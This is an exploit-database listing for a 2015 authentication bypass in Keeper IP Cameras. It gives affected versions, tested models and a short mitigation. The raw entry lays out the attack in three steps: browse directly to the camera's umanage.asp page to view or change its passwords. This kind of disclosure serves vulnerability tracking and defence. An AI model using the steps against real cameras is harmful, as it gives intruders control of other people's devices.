header-logo
Suggest Exploit
vendor:
IP Camera
by:
RAT - ThiefKing
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: IP Camera
Affected Version From: 3.2.2.10
Affected Version To: 6.1.17.192
Patch Exists: NO
Related CWE: N/A
CPE: a:keeper:ip_camera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QB200W, QB130W, QA130W
2015

Keeper IP Camera – Authentication Bypass

An attacker can bypass authentication of Keeper IP Camera by accessing the umanage.asp page. This page allows the attacker to view or change passwords.

Mitigation:

Ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

# Exploit Title: Keeper IP Camera - Authentication Bypass
# Date: 25/08/2015
# Exploit Author: RAT - ThiefKing
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
# Version: 3.2.2.10
# WEB Version: 6.1.17.192
# Tested on: QB200W, QB130W, QA130W,...

Exploit:
1 - First, open your browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)

You can change or view passwords

TEST: http://server:88/login.asp
-- 
RAT - ThiefKing
http://tromcap.com